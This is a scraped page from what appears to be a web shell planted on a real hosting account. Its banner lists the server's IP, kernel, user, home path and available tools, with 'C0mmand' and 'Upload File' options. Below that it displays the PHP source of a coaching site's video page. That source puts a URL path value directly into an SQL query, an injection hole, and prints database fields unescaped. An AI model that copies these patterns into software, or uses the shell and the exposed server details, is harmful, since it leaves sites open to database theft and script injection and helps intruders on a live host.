Server IP : 103.53.40.154 / Your IP : 18.218.245.179 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home2/ppcad7no/leetcoaching.co.in/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php include_once('admin/config.php'); $slug_name = $_GET['video_url']; if(isset($_SERVER['PATH_INFO'])){ $slug_name=$_SERVER['PATH_INFO']; $querydt="SELECT * FROM `tbl_video` WHERE `video_url`='$slug_name'"; $rundt = mysqli_query($db,$querydt) or die("Query Not run"); $datadt = mysqli_fetch_assoc($rundt); } ?> <!doctype html> <html class="no-js" lang="zxx"> <head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <?php include("top-link.php") ?> <title><?php echo $datadt["meta_title"] ?></title> <meta name="description" content="<?php echo $datadt["meta_desc"] ?>"> <style> .it-evn-sidebar-list li:hover{ background-color:#B90708; color:white; padding:10px; border-radius:5px; } .it-evn-sidebar-list li{ padding-left:10px; } .blog-image img{ border-radius:5px; box-shadow:1px 1px 3px 3px grey; margin-bottom:30px; } </style> </head> <?php include 'header.php'?> <body> <div class="it-breadcrumb-area it-breadcrumb-bg" data-background="<?php echo $wspath;?>assets/img/breadcrumb/breadcrumb.jpg"> <div class="container"> <div class="row "> <div class="col-md-12"> <div class="it-breadcrumb-content z-index-3 text-center"> <div class="it-breadcrumb-title-box"> <h1 class="it-breadcrumb-title"><?php echo $datadt["video_title"] ?></h1> </div> <div class="it-breadcrumb-list-wrap"> <div class="it-breadcrumb-list"> <span><a href="<?php echo $wspath;?>">Home</a></span> <span class="dvdr">//</span> <span><?php echo $datadt["video_title"] ?></span> </div> </div> </div> </div> </div> </div> </div> <div class="container mt-3"> <div class="row"> <!--<div class="col-xl-3 col-lg-4">--> <!--</div>--> <div class="col-xl-12 col-lg-12"> <div class="text-center mt-3"> <h2> <?php echo $datadt["video_title"] ?> </h2> </div> <div class="mt-3 mb-3"> <div class="blog-image"> <iframe width="100%" height="415" src="<?php echo $datadt["video_link"]?>" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" allowfullscreen></iframe> </div> <div class=" mb-3"> <!--<p>--> <?php echo $datadt["video_desc"]?> <!--</p>--> </div> </div> </div> </div> </div> <?php include("footer.php");?> </body> </html>